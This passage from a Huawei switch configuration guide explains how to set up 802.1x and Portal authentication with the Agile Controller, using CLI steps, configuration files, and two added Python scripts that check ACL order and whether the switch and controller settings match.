port link-type trunk
port trunk allow-pass vlan 200
authentication dot1x mac-authen
mac-authen username fixed A-123 password cipher %^%#7JxKWaX6c0\X4RHfJ$M6|duQ*k{7uXu{J{S=zx-3%^%#
#
interface GigabitEthernet1/0/6
port link-type trunk
port trunk allow-pass vlan 100
#
ip route-static 192.168.100.0 255.255.255.0 192.168.10.10
ip route-static 192.168.102.0 255.255.255.0 192.168.10.10
#
return

l SwitchC configuration file


#
sysname SwitchC
#
vlan batch 200
#
l2protocol-tunnel user-defined-protocol 802.1x protocol-mac 0180-c200-0003 group-mac 0100-0000-0002
#

interface GigabitEthernet0/0/1
port link-type access
port default vlan 200
l2protocol-tunnel user-defined-protocol 802.1x enable
#
interface GigabitEthernet0/0/2
port link-type access
port default vlan 200
l2protocol-tunnel user-defined-protocol 802.1x enable
#
interface GigabitEthernet0/0/3
port link-type trunk
port trunk allow-pass vlan 200
l2protocol-tunnel user-defined-protocol 802.1x enable
#
return
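Two things in this example are easy to get wrong in practice: what ACL 3002 actually lets an authorized user reach, and whether the values typed into the Agile Controller (RADIUS ports, real-time accounting interval) match what the switch runs. The Python below is an added example (not code from the Huawei guide or from the Agile Controller) that parses a constructed subset of the SwitchA configuration file shown above, evaluates ACL 3002 the way the switch does (first matching rule wins), and cross-checks the switch-side RADIUS values against the controller-side values from the Add Device table. The cipher-text shared-key line is left out of the constructed configuration because a ciphered key cannot be compared from a configuration file; that comparison has to be made on the controller side.

```python
"""Added example: read ACL and RADIUS settings out of a Huawei configuration
file and check them against what was entered on the Agile Controller.
SWITCHA_CONFIG is a constructed subset of the page's SwitchA file; the
controller values are the ones shown in the Add Device table."""
import ipaddress
import re

SWITCHA_CONFIG = """\
#
sysname SwitchA
#
radius-server template rd1
 radius-server authentication 192.168.100.100 1812 weight 80
 radius-server accounting 192.168.100.100 1813 weight 80
#
acl number 3002
 rule 1 permit ip destination 192.168.102.100 0
 rule 2 deny ip
#
aaa
 accounting-scheme acco1
  accounting-mode radius
  accounting realtime 15
#
return
"""

# Constructed from the Add Device table: what the controller expects of the switch.
CONTROLLER_DEVICE_SETTINGS = {
    "authentication_port": 1812,
    "accounting_port": 1813,
    "realtime_interval_min": 15,
}


def wildcard_to_network(ip: str, wildcard: str) -> ipaddress.IPv4Network:
    """Convert a Huawei 'ip wildcard' pair to a network.

    Set bits in a wildcard are don't-care bits; '0' is shorthand for 0.0.0.0,
    i.e. an exact host match.
    """
    if wildcard == "0":
        wildcard = "0.0.0.0"
    wc = int(ipaddress.IPv4Address(wildcard))
    if wc & (wc + 1):
        raise ValueError(f"non-contiguous wildcard not supported here: {wildcard}")
    prefix = 32 - wc.bit_length()
    return ipaddress.ip_network(f"{ip}/{prefix}", strict=False)


def parse_acl_rules(config: str, acl_number: int):
    """Return [(rule_id, action, destination_network_or_None)] for one ACL."""
    rules = []
    in_acl = False
    for line in config.splitlines():
        s = line.strip()
        if s.startswith("acl number "):
            in_acl = int(s.split()[2]) == acl_number
        elif s == "#":  # '#' closes a configuration block
            in_acl = False
        elif in_acl and s.startswith("rule "):
            parts = s.split()
            dest = None
            if "destination" in parts:
                i = parts.index("destination")
                dest = wildcard_to_network(parts[i + 1], parts[i + 2])
            rules.append((int(parts[1]), parts[2], dest))
    return rules


def acl_decision(rules, dst_ip: str) -> str:
    """First matching rule wins, as on the switch; 'no-match' if none applies."""
    dst = ipaddress.IPv4Address(dst_ip)
    for _, action, dest in sorted(rules, key=lambda r: r[0]):
        if dest is None or dst in dest:
            return action
    return "no-match"


def parse_radius_settings(config: str) -> dict:
    """Pull the RADIUS server addresses/ports and the real-time accounting interval."""
    found = {}
    for line in config.splitlines():
        s = line.strip()
        m = re.match(r"radius-server (authentication|accounting) (\S+) (\d+)", s)
        if m:
            found[f"{m.group(1)}_server"] = m.group(2)
            found[f"{m.group(1)}_port"] = int(m.group(3))
        m = re.match(r"accounting realtime (\d+)", s)
        if m:
            found["realtime_interval_min"] = int(m.group(1))
    return found


def mismatches(switch_values: dict, controller_values: dict) -> dict:
    """Keys whose switch-side and controller-side values differ -> (switch, controller)."""
    return {
        k: (switch_values.get(k), v)
        for k, v in controller_values.items()
        if switch_values.get(k) != v
    }


if __name__ == "__main__":
    rules = parse_acl_rules(SWITCHA_CONFIG, 3002)
    for dst in ("192.168.102.100", "192.168.102.101", "192.168.100.100"):
        print(dst, "->", acl_decision(rules, dst))
    print("mismatches:", mismatches(parse_radius_settings(SWITCHA_CONFIG), CONTROLLER_DEVICE_SETTINGS))
```

With the page's ACL, only 192.168.102.100 is permitted for an authorized user and every other destination, including the RADIUS server itself, hits rule 2 and is denied; an empty mismatches result means the ports and interval on the switch agree with the controller entry. The same functions work on a full display current-configuration dump.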

10.6 Typical NAC Configuration (Unified Mode) (the Agile Controller as the Authentication Server) (V200R007C20, V200R009C00 and Later Versions)

10.6.1 Example for Configuring Portal Authentication to Control Internal User Access to the Enterprise Network (Authentication Point on Core Switch)
Portal Authentication Overview
Portal authentication is a Network Admission Control (NAC) method, also called web authentication. Portal authentication websites are generally referred to as Portal websites. Users must be authenticated by a Portal website before they can use network services.
Portal authentication is insecure, but it allows flexible networking because no client software is required on users' terminals. 802.1x authentication is another NAC method. It is more secure than Portal authentication, but requires client software to be installed on users' terminals, which makes networking less flexible. Like Portal authentication, MAC address authentication does not require client software, but user terminals' MAC addresses must be registered on the authentication server, which makes network configuration and management complex.
Portal authentication applies to users who are sparsely distributed and move frequently, for example, guests of a company.

Configuration Notes
l This example applies to V200R007C20, V200R009 and later versions.
NOTE
To know details about software mappings, see Version Mapping Search for Huawei Campus Switches.
l Huawei's Agile Controller in V100R001C00 functions as the Portal server and RADIUS server in this example. For the Agile Controller, the minimum version required is V100R001C00.

l The RADIUS authentication and accounting shared keys and Portal shared key on the
switch must be the same as those on the Agile Controller server.
l By default, the switch allows the packets from RADIUS and Portal servers to pass. You
do not need to configure authentication-free rules for the two servers on the switch.

Networking Requirements
An enterprise needs to deploy an identity authentication system to control employees' network
access rights and allow only authorized users to access the network.
The enterprise has the following requirements:
l The authentication operations should be simple. The authentication system only performs access authorization, and minimal client software is installed on user terminals.
l To facilitate network reconstruction and reduce investment, the enterprise requires the authentication point to be deployed on the core switch.
l A unified identity authentication mechanism is used to authenticate all terminals accessing the campus network and to deny access from unauthorized terminals.
l R&D employees can connect only to public servers (such as the web and DNS servers) of the enterprise before authentication, and can connect to both the intranet (code library and issue tracking system) and the Internet after being authenticated.
l Marketing employees can connect only to public servers (such as the web and DNS servers) of the enterprise before authentication, and can connect only to the Internet after being authenticated.

Figure 10-39 Portal authentication deployed at the core layer

[Figure: the Agile Controller (includes Portal and RADIUS servers), the DNS server and the Web server form the pre-authentication domain; the Internet, the code library and the issue tracking system form the post-authentication domain. The core switch SwitchD (GE1/0/1, GE1/0/2) is the authentication point. The aggregation switch SwitchC (GE1/0/1, GE1/0/2, GE1/0/3) connects to the access switches SwitchA (R&D Dept.) and SwitchB (Marketing Dept.), each using GE0/0/1 and GE0/0/2; PCs and a laptop connect to the access switches.]

VLAN Plan

Table 10-15 VLAN plan

VLAN ID | Function
101 | VLAN for R&D employees
102 | VLAN for marketing employees
103 | VLAN for connection between the aggregation switch and core switch
104 | VLAN to which interfaces connecting to the servers belong

Network Data Plan

Table 10-16 Network data plan

Item | Data | Description
Access switch (connecting to the R&D department) | Interface number: GE0/0/1; VLAN: 101 | Connects to employees' PCs.
Access switch (connecting to the R&D department) | Interface number: GE0/0/2; VLAN: 101 | Connects to the aggregation switch.
Access switch (connecting to the marketing department) | Interface number: GE0/0/1; VLAN: 102 | Connects to employees' PCs.
Access switch (connecting to the marketing department) | Interface number: GE0/0/2; VLAN: 102 | Connects to the aggregation switch.
Aggregation switch | Interface number: GE1/0/1; VLAN: 101; VLANIF101 IP address: 192.168.0.1 | Connects to the access switch of the R&D department. Functions as the gateway for R&D employees.
Aggregation switch | Interface number: GE1/0/2; VLAN: 102; VLANIF102 IP address: 192.168.1.1 | Connects to the access switch of the marketing department. Functions as the gateway for marketing employees.
Aggregation switch | Interface number: GE1/0/3; VLAN: 103; VLANIF103 IP address: 172.16.2.1 | Connects to the core switch.
Core switch | Interface number: GE1/0/1; VLAN: 103; VLANIF103 IP address: 172.16.2.2 | Connects to the aggregation switch.
Core switch | Interface number: GE1/0/2; VLAN: 104; VLANIF104 IP address: 172.16.1.254 | Connects to the server area and functions as the gateway for the servers.
Server | Agile Controller (RADIUS server + Portal server) IP address: 172.16.1.1 | -
Server | DNS server IP address: 172.16.1.2 | -
Server | Web server IP address: 172.16.1.3 | -
Server | Code library IP address: 172.16.1.4 | -
Server | Issue tracking system IP address: 172.16.1.5 | -

Service Data Plan

Table 10-17 Service data plan

Item | Data | Description
Core switch | Number of the ACL for R&D employees' post-authentication domain: 3001 | You need to enter this ACL number when configuring authorization rules and results on the Agile Controller.
Core switch | Number of the ACL for marketing employees' post-authentication domain: 3002 | You need to enter this ACL number when configuring authorization rules and results on the Agile Controller.
Core switch | Authentication server: IP address 172.16.1.1; port number 1812; RADIUS shared key Admin@123. Accounting server: IP address 172.16.1.1; port number 1813; RADIUS shared key Admin@123; accounting interval 15. Portal server: IP address 172.16.1.1; port number that the switch uses to process Portal protocol packets: 2000; destination port number in the packets that the switch sends to the Portal server: 50200; Portal authentication shared key: Admin@123 | The Service Controller (SC) of the Agile Controller integrates the RADIUS server and Portal server. Therefore, the IP addresses of the authentication server, accounting server, authorization server, and Portal server are all the SC's IP address. Configure a RADIUS accounting server to collect user login and logout information. The port numbers of the authentication server and accounting server must be the same as the authentication and accounting port numbers of the RADIUS server. Configure an authorization server to enable the RADIUS server to deliver authorization rules to the switch. The RADIUS shared key of the authorization server must be the same as those of the authentication server and accounting server.
Agile Controller | Host name: access.example.com | Users can use the domain name to access the Portal server.
Agile Controller | Device IP address: 172.16.1.254 | -
Agile Controller | Authentication port: 1812 | -
Agile Controller | Accounting port: 1813 | -
Agile Controller | RADIUS shared key: Admin@123 | The RADIUS shared key must be the same as that configured on the switch.
Agile Controller | Port number that the Portal server uses to receive packets: 50200 | -
Agile Controller | Portal shared key: Admin@123 | It must be the same as the Portal authentication shared key configured on the switch.
Agile Controller | Department: R&D; user: A; account: A-123; password: Huawei123. Department: Marketing; user: B; account: B-123; password: Huawei123 | Two departments and two corresponding accounts have been created on the Agile Controller: the R&D department with an R&D employee account A-123, and the Marketing department with a marketing employee account B-123.
Pre-authentication domain | Agile Controller (including RADIUS server and Portal server), DNS server, and web server | -
Post-authentication domain | R&D employees: code library, issue tracking system, and Internet. Marketing employees: Internet | -

Configuration Roadmap
1. Configure the access switch, aggregation switch, and core switch to ensure network
connectivity.
2. Configure Portal authentication on the core switch to implement user access control.
Configure parameters for connecting to the RADIUS server and those for connecting to
the Portal server, enable Portal authentication, and configure network access rights for
the pre-authentication domain and post-authentication domain.
3. Configure the Agile Controller:
a. Log in to the Agile Controller.
b. Add user accounts to the Agile Controller.
c. Add a switch to the Agile Controller and configure related parameters to ensure
normal communication between the Agile Controller and switch.
d. Add authorization results and authorization rules to grant different access rights to
R&D employees and marketing employees after they are successfully authenticated.

Procedure
Step 1 Configure the access switch to ensure network connectivity.
The following provides the configuration for SwitchA, the access switch connecting to the R&D department. The configuration for SwitchB, the access switch connecting to the marketing department, is similar to that for SwitchA.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan 101
[SwitchA-vlan101] quit
[SwitchA] interface gigabitethernet 0/0/1 //Interface connected to the R&D department
[SwitchA-GigabitEthernet0/0/1] port link-type access
[SwitchA-GigabitEthernet0/0/1] port default vlan 101
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2 //Interface connected to the aggregation switch
[SwitchA-GigabitEthernet0/0/2] port link-type trunk
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 101
[SwitchA-GigabitEthernet0/0/2] quit
[SwitchA] quit
<SwitchA> save //Save the configuration.


Step 3 Configure the core switch.


1. Create VLANs and configure the VLANs allowed by interfaces so that packets can be forwarded.
<HUAWEI> system-view
[HUAWEI] sysname SwitchD
[SwitchD] vlan batch 103 104
[SwitchD] interface gigabitethernet 1/0/1 //Interface connected to the aggregation switch
[SwitchD-GigabitEthernet1/0/1] port link-type trunk
[SwitchD-GigabitEthernet1/0/1] port trunk allow-pass vlan 103
[SwitchD-GigabitEthernet1/0/1] quit
[SwitchD] interface vlanif 103
[SwitchD-Vlanif103] ip address 172.16.2.2 255.255.255.0
[SwitchD-Vlanif103] quit
[SwitchD] interface gigabitethernet 1/0/2 //Interface connected to the server area
[SwitchD-GigabitEthernet1/0/2] port link-type access
[SwitchD-GigabitEthernet1/0/2] port default vlan 104
[SwitchD-GigabitEthernet1/0/2] quit
[SwitchD] interface vlanif 104
[SwitchD-Vlanif104] ip address 172.16.1.254 255.255.255.0 //Configure the gateway address for the server area.
[SwitchD-Vlanif104] quit
[SwitchD] ip route-static 192.168.0.0 255.255.255.0 172.16.2.1 //Configure a route to the network segment assigned to the R&D department.
[SwitchD] ip route-static 192.168.1.0 255.255.255.0 172.16.2.1 //Configure a route to the network segment assigned to the marketing department.
[SwitchD] quit
<SwitchD> save //Save the configuration.

2. Configure parameters for connecting to the RADIUS server.
<SwitchD> system-view
[SwitchD] radius-server template policy //Create the RADIUS server template policy.
[SwitchD-radius-policy] radius-server authentication 172.16.1.1 1812 //Configure the IP address and port number of the RADIUS authentication server.
[SwitchD-radius-policy] radius-server accounting 172.16.1.1 1813 //Configure the IP address and port number of the RADIUS accounting server.
[SwitchD-radius-policy] radius-server shared-key cipher Admin@123 //Set the authentication key and accounting key to Admin@123.
[SwitchD-radius-policy] quit
[SwitchD] aaa //Enter the AAA view.
[SwitchD-aaa] authentication-scheme auth //Configure the authentication scheme auth.
[SwitchD-aaa-authen-auth] authentication-mode radius //Set the authentication mode to RADIUS.
[SwitchD-aaa-authen-auth] quit
[SwitchD-aaa] accounting-scheme acco //Configure the accounting scheme acco.
[SwitchD-aaa-accounting-acco] accounting-mode radius //Set the accounting mode to RADIUS.
[SwitchD-aaa-accounting-acco] accounting realtime 15 //Set the real-time accounting interval to 15 minutes.
[SwitchD-aaa-accounting-acco] quit
[SwitchD-aaa] domain portal //Configure a domain.
[SwitchD-aaa-domain-portal] authentication-scheme auth //Bind the authentication scheme auth to the domain.
[SwitchD-aaa-domain-portal] accounting-scheme acco //Bind the accounting scheme acco to the domain.
[SwitchD-aaa-domain-portal] radius-server policy //Bind the RADIUS server template policy to the domain.
[SwitchD-aaa-domain-portal] quit
[SwitchD-aaa] quit
[SwitchD] domain portal //Configure portal as the global default domain.

3. Configure parameters for connecting to the Portal server.


[SwitchD] web-auth-server portal_huawei //Configure the Portal server
template portal_huawei.
[SwitchD-web-auth-server-portal_huawei] server-ip 172.16.1.1 //Set the
Portal server IP address.
[SwitchD-web-auth-server-portal_huawei] source-ip 172.16.1.254 //Set the
IP address that the switch uses to communicate with the Portal server.
[SwitchD-web-auth-server-portal_huawei] port 50200 //Set the destination
port number in the packets that the switch sends to the Portal server to
50200, which is the same as the port number that the Portal server uses to
receive packets. The default destination port number on the switch is 50100,
and you must change it to 50200 manually, so that it matches the port number
on the Portal server.
[SwitchD-web-auth-server-portal_huawei] shared-key cipher Admin@123 //
Configure the shared key for communication with the Portal server, which must
be the same as that configured on the Portal server.
[SwitchD-web-auth-server-portal_huawei] url http://access.example.com:8080/
portal //Configure the URL for the Portal authentication page, in which
access.example.com indicates the host name of the Portal server. The domain
name is recommended in the URL so that the Portal authentication page can be
pushed to users faster and more securely. To use the domain name in the URL,
you must configure the mapping between this domain name access.example.com
and Portal server IP address on the DNS server in advance.
[SwitchD-web-auth-server-portal_huawei] quit
[SwitchD] web-auth-server listening-port 2000 //Configure the port number
that the switch uses to process Portal protocol packets. The default port
number is 2000. If the port number is changed on the server, change it
accordingly on the switch.
[SwitchD] portal quiet-period //Enable the quiet function for Portal
authentication users. If the number of times that a Portal authentication
user fails to be authenticated within 60 seconds exceeds the specified value,
the device discards the user's Portal authentication request packets for a
period to prevent impact of frequent authentication failures on the system.
[SwitchD] portal quiet-times 5 //Configure the maximum number of
authentication failures within 60 seconds before the device quiets a Portal
authentication user.
[SwitchD] portal timer quiet-period 240 //Set the quiet period to 240
seconds.

4. Enable Portal authentication and configure network access rights for users in the
pre-authentication domain and post-authentication domain.

# Set the NAC mode to unified.


[SwitchD] authentication unified-mode //Set the NAC mode to unified. By
default, the switch works in unified mode. After changing the NAC mode from
common to unified, save the configuration and restart the switch to make the
configuration take effect.

# Configure a Portal access profile.


[SwitchD] portal-access-profile name web1
[SwitchD-portal-acces-profile-web1] web-auth-server portal_huawei layer3
[SwitchD-portal-acces-profile-web1] quit

# Configure an authentication-free rule profile and specify network access rights for
users in the pre-authentication domain.
[SwitchD] free-rule-template name default_free_rule
[SwitchD-free-rule-default_free_rule] free-rule 1 destination ip 172.16.1.2
mask 255.255.255.255 //Configure authentication-free rules for Portal
authentication users, so that these users can access the DNS server before
the authentication.
[SwitchD-free-rule-default_free_rule] free-rule 2 destination ip 172.16.1.3
mask 255.255.255.255 //Configure authentication-free rules for Portal
authentication users, so that these users can access the web server before
the authentication.
[SwitchD-free-rule-default_free_rule] quit

# Configure an authentication profile.


[SwitchD] authentication-profile name p1
[SwitchD-authen-profile-p1] portal-access-profile web1 //Bind the Portal
access profile web1.
[SwitchD-authen-profile-p1] quit

# Enable Portal authentication.


[SwitchD] interface vlanif 103
[SwitchD-Vlanif103] authentication-profile p1
[SwitchD-Vlanif103] quit

# Configure network access rights for the post-authentication domain.


[SwitchD] acl 3001 //Configure the post-authentication domain for R&D
employees.
[SwitchD-acl-adv-3001] rule 1 permit ip //Allow R&D employees to access
all resources.
[SwitchD-acl-adv-3001] quit
[SwitchD] acl 3002 //Configure the post-authentication domain for
marketing employees.
[SwitchD-acl-adv-3002] rule 1 deny ip destination 172.16.1.4 0 //Prevent
marketing employees from accessing the code library.
[SwitchD-acl-adv-3002] rule 2 deny ip destination 172.16.1.5 0 //Prevent
marketing employees from accessing the issue tracking system.
[SwitchD-acl-adv-3002] rule 3 permit ip //Allow marketing employees to
access other resources.
[SwitchD-acl-adv-3002] quit
[SwitchD] quit
<SwitchD> save //Save the configuration.

Step 4 Configure the Agile Controller.


1. Log in to the Agile Controller.
a. Open the Internet Explorer, enter the Agile Controller address in the address box,
and press Enter.
The following table provides two types of Agile Controller addresses.

Address Format | Description
https://Agile Controller-IP:8443 | In the address, Agile Controller-IP indicates the Agile Controller IP address.
Agile Controller IP address | If port 80 is enabled during installation, you can access the Agile Controller by simply entering its IP address without the port number. The Agile Controller address will automatically change to https://Agile Controller-IP:8443.

b. Enter the administrator account and password.


If you log in to the Agile Controller for the first time, use the super administrator
account admin and password Changeme123. Change the password immediately
after logging in. Otherwise, the Agile Controller cannot be used.
2. Create departments and accounts. The following describes how to create the R&D
department. Create the Marketing department similarly.
a. Choose Resource > User > User Management.
b. Click the Department tab in the operation area on the right. Then click Add under
the Department tab, and add the department R&D.

c. Click the User tab in the operation area on the right. Then click Add under the User
tab, and add the user A.
d. Click in the Operation column on the right of user A. The Account Management page
is displayed. Click Add, and create a common account A-123 with the password
Huawei123.

e. On the User tab page, select user A and click Transfer to add user A to the R&D
department.

3. Add a switch to the Agile Controller and configure related parameters to ensure normal
communication between the Agile Controller and switch.
a. Choose Resource > Device > Device Management.
b. Click Add.
c. Configure parameters for the switch.
Parameter | Value | Description
Name | SW | -
IP Address | 172.16.1.254 | The interface must be able to communicate with the SC.
Device series | Huawei Quidway Series | -
Authentication Key | Admin@123 | It must be the same as the shared key of the RADIUS authentication server configured on the switch.
Charging Key | Admin@123 | It must be the same as the shared key of the RADIUS accounting server configured on the switch.
Real-time charging interval (minute) | 15 | It must be the same as the real-time accounting interval configured on the switch.
Port | 2000 | This is the port that the switch uses to communicate with the Portal server. Retain the default value.
Portal Key | Admin@123 | It must be the same as the Portal shared key configured on the switch.
Allowed IP Addresses | 192.168.0.1/24; 192.168.1.1/24 | -

d. Click OK.
4. Configure employee authorization. This example describes how to configure R&D
employee authorization. The configuration procedure for marketing employees is the
same, except that the network resources the two types of employees can access are
different.
a. Choose Policy > Permission Control > Authentication and Authorization >
Authorization Result, and configure resources that R&D employees can access
after authentication and authorization.

Parameter | Value | Description
Name | R&D employee post-authentication domain | -
Service Type | Access Service | -
ACL Number/AAA User Group | 3001 | The ACL number must be the same as the number of the ACL configured for R&D employees on the switch.

b. Choose Policy > Permission Control > Authentication and Authorization >
Authorization Rule, and specify the authorization conditions for R&D employees.
Parameter | Value | Description
Name | R&D employee authorization rule | -
Service Type | Access User | -
Department | R&D | -
Authorization Result | R&D employee post-authentication domain | -

Step 5 Verify the configuration.


l Employees can access only the Agile Controller, DNS, and web servers before
authentication.
l The Portal authentication page is pushed to an employee when the employee attempts to
visit an Internet website. After the employee enters the correct account and password, the
requested web page is displayed.
l R&D employee A can access the Internet, code library, and issue tracking system after
authentication. Marketing employee B can access the Internet but not the code library
and issue tracking system after authentication.


l After an employee is authenticated, run the display access-user command on the switch.
The command output shows that the employee is online.
----End

Configuration Files
# Configuration file of the access switch for the R&D department (The configuration file
of the access switch for the marketing department is similar.)
#
sysname SwitchA
#
vlan batch 101
#
interface GigabitEthernet0/0/1
port link-type access
port default vlan 101
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk allow-pass vlan 101
#
return

# Configuration file of the aggregation switch


#
sysname SwitchC
#
vlan batch 101 to 103
#
dhcp enable
#
interface Vlanif101
ip address 192.168.0.1 255.255.255.0
dhcp select interface
dhcp server dns-list 172.16.1.2
#
interface Vlanif102
ip address 192.168.1.1 255.255.255.0
dhcp select interface
dhcp server dns-list 172.16.1.2
#
interface Vlanif103
ip address 172.16.2.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk pvid vlan 101
port trunk allow-pass vlan 101
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk pvid vlan 102
port trunk allow-pass vlan 102
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk pvid vlan 103
port trunk allow-pass vlan 103
#
ip route-static 172.16.1.0 255.255.255.0 172.16.2.2
#
return

# Configuration file of the core switch


#
sysname SwitchD

#
vlan batch 103 to 104
#
authentication-profile name p1
portal-access-profile web1
#
domain portal
#
radius-server template policy
radius-server shared-key cipher %#%#1*yT+0O\X;V}hP,G^TMN7mTXA^mIz)SoR:86;lNK%#%#
radius-server authentication 172.16.1.1 1812 weight 80
radius-server accounting 172.16.1.1 1813 weight 80
#
acl number 3001
rule 1 permit ip
acl number 3002
rule 1 deny ip destination 172.16.1.4 0
rule 2 deny ip destination 172.16.1.5 0
rule 3 permit ip
#
free-rule-template name default_free_rule
free-rule 1 destination ip 172.16.1.2 mask 255.255.255.255
free-rule 2 destination ip 172.16.1.3 mask 255.255.255.255
#
web-auth-server portal_huawei
server-ip 172.16.1.1
port 50200
shared-key cipher %#%#q9a^<=Ct5'=0n40/1g}/m6Mo,U9u5!s(GYM}Z{<~%#%#
url http://access.example.com:8080/portal
source-ip 172.16.1.254
#
portal-access-profile name web1
web-auth-server portal_huawei layer3
#
aaa
authentication-scheme auth
authentication-mode radius
accounting-scheme acco
accounting-mode radius
accounting realtime 15
domain portal
authentication-scheme auth
accounting-scheme acco
radius-server policy
#
interface Vlanif103
ip address 172.16.2.2 255.255.255.0
authentication-profile p1
#
interface Vlanif104
ip address 172.16.1.254 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 103
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 104
#
ip route-static 192.168.0.0 255.255.255.0 172.16.2.1
ip route-static 192.168.1.0 255.255.255.0 172.16.2.1
#
portal quiet-period
portal timer quiet-period 240
portal quiet-times 5
#
return
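As an added consistency check that is not part of the Huawei document: a Python script that parses the core switch configuration file above and verifies the points this example depends on (the ACLs named in the Agile Controller authorization results exist and their deny rules precede the catch-all permit, the DNS and web servers have authentication-free rules, the RADIUS ports match, the Portal port was changed from the switch default 50100 to 50200, and the profile chain from VLANIF 103 down to the Portal server template is complete). The configuration excerpt and the CONTROLLER values are taken from this page; the function names are my own.

```python
import re

# Constructed sample: the lines of the core switch (SwitchD) configuration file on
# this page that the checks below look at (cipher-text shared keys left out).
SWITCHD_CONFIG = """\
authentication-profile name p1
 portal-access-profile web1
#
radius-server template policy
 radius-server authentication 172.16.1.1 1812 weight 80
 radius-server accounting 172.16.1.1 1813 weight 80
acl number 3001
 rule 1 permit ip
acl number 3002
 rule 1 deny ip destination 172.16.1.4 0
 rule 2 deny ip destination 172.16.1.5 0
 rule 3 permit ip
#
free-rule-template name default_free_rule
 free-rule 1 destination ip 172.16.1.2 mask 255.255.255.255
 free-rule 2 destination ip 172.16.1.3 mask 255.255.255.255
web-auth-server portal_huawei
 server-ip 172.16.1.1
 port 50200
#
portal-access-profile name web1
 web-auth-server portal_huawei layer3
interface Vlanif103
 authentication-profile p1
return
"""

# Values entered on the Agile Controller side, taken from this page's tables.
CONTROLLER = {
    "ip": "172.16.1.1",
    "radius_ports": {"authentication": 1812, "accounting": 1813},
    "portal_template": "portal_huawei",
    "portal_port": 50200,  # port the Portal server receives on; the switch default is 50100
    "authorization_acls": {"R&D": 3001, "marketing": 3002},
    "pre_auth_servers": {"DNS": "172.16.1.2", "web": "172.16.1.3"},
    "auth_vlanif": 103,
}


def parse_blocks(text):
    """Map each non-indented command line to the indented sub-commands under it."""
    blocks, head = {}, None
    for line in text.splitlines():
        if line.strip() in ("", "#", "return"):
            continue
        if not line.startswith(" "):
            head = line.strip()
            blocks[head] = []
        elif head is not None:
            blocks[head].append(line.strip())
    return blocks


def check_portal_config(text, ctl):
    """Return findings where the switch configuration does not match the values
    entered on the Agile Controller; an empty list means it is consistent."""
    blocks, findings = parse_blocks(text), []
    for who, acl in ctl["authorization_acls"].items():
        rules = blocks.get(f"acl number {acl}")
        if rules is None:
            findings.append(f"ACL {acl} ({who} authorization result) is missing on the switch")
            continue
        # A catch-all "permit ip" listed before a deny makes that deny unreachable.
        permit_all = [i for i, r in enumerate(rules) if re.fullmatch(r"rule \d+ permit ip", r)]
        denies = [i for i, r in enumerate(rules) if " deny " in r]
        if permit_all and denies and permit_all[0] < max(denies):
            findings.append(f"ACL {acl}: catch-all permit precedes a deny rule")
    free_hosts = set(re.findall(r"free-rule \d+ destination ip (\S+) mask 255\.255\.255\.255", text))
    for name, ip in ctl["pre_auth_servers"].items():
        if ip not in free_hosts:
            findings.append(f"no authentication-free rule for the {name} server {ip}")
    rad = blocks.get("radius-server template policy", [])
    for kind, port in ctl["radius_ports"].items():
        if not any(r.startswith(f"radius-server {kind} {ctl['ip']} {port}") for r in rad):
            findings.append(f"RADIUS {kind} server {ctl['ip']}:{port} not in template policy")
    portal = blocks.get(f"web-auth-server {ctl['portal_template']}", [])
    if f"port {ctl['portal_port']}" not in portal:
        findings.append(f"Portal destination port is not {ctl['portal_port']} (switch default is 50100)")
    # Binding chain: VLANIF -> authentication-profile -> portal-access-profile -> Portal template.
    vlanif = blocks.get(f"interface Vlanif{ctl['auth_vlanif']}", [])
    profiles = [r.split()[1] for r in vlanif if r.startswith("authentication-profile ")]
    if not profiles:
        findings.append(f"no authentication-profile applied on Vlanif{ctl['auth_vlanif']}")
    for p in profiles:
        prof = blocks.get(f"authentication-profile name {p}", [])
        paps = [r.split()[1] for r in prof if r.startswith("portal-access-profile ")]
        if not paps:
            findings.append(f"authentication-profile {p} binds no Portal access profile")
        for a in paps:
            bound = blocks.get(f"portal-access-profile name {a}", [])
            if not any(r.startswith(f"web-auth-server {ctl['portal_template']} ") for r in bound):
                findings.append(f"portal-access-profile {a} does not bind {ctl['portal_template']}")
    return findings
```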

10.6.2 Example for Configuring Portal Authentication to Control Internal User Access to
the Enterprise Network (Authentication Point on Aggregation Switch) (V200R007C20,
V200R009C00 and Later Versions)

Portal Authentication Overview


Portal authentication is a Network Admission Control (NAC) method. Portal authentication is
also called web authentication. Generally, Portal authentication websites are referred to as
Portal websites. Users must be authenticated by the Portal websites before they can use
network services.

Portal authentication is insecure, but allows flexible networking as no client software is
required on users' terminals. 802.1x authentication is another NAC method. It is more secure
than Portal authentication, but requires the installation of client software on users' terminals,
resulting in networking inflexibility. Like Portal authentication, MAC address authentication
also does not require the installation of client software, but user terminals' MAC addresses
must be registered on the authentication server, so network configuration and management
are complex.

Portal authentication applies to the users who are sparsely distributed and move frequently,
for example, guests of a company.

Configuration Notes
l This example applies to V200R007C20, V200R009 and later versions.
NOTE: For details about software mappings, see Version Mapping Search for Huawei Campus
Switches.
l Huawei's Agile Controller in V100R001C00 functions as the Portal server and RADIUS
server in this example. For the Agile Controller, the minimum version required is
V100R001C00.
l The RADIUS authentication and accounting shared keys and Portal shared key on the
switch must be the same as those on the Agile Controller server.
l By default, the switch allows the packets from RADIUS and Portal servers to pass. You
do not need to configure authentication-free rules for the two servers on the switch.

Networking Requirements
An enterprise needs to deploy an identity authentication system to control employees' network
access rights and allow only authorized users to access the network.

The enterprise has the following requirements:


l The authentication operations should be simple. The authentication system only
performs access authorization. Minimum client software is installed on user terminals.
l Moderate security control is required. To facilitate maintenance, a moderate number of
authentication points need to be deployed on the aggregation switch.
l A unified identity authentication mechanism is used to authenticate all terminals
accessing the campus network and deny access from unauthorized terminals.

l R&D employees can connect only to public servers (such as the web and DNS servers)
of the enterprise before the authentication, and can connect to both the intranet (code
library and issue tracking system) and Internet after being authenticated.
l Marketing employees can connect only to public servers (such as the web and DNS
servers) of the enterprise before the authentication, and can connect only to the Internet
after being authenticated.

Figure 10-40 Portal authentication deployed at the aggregation layer

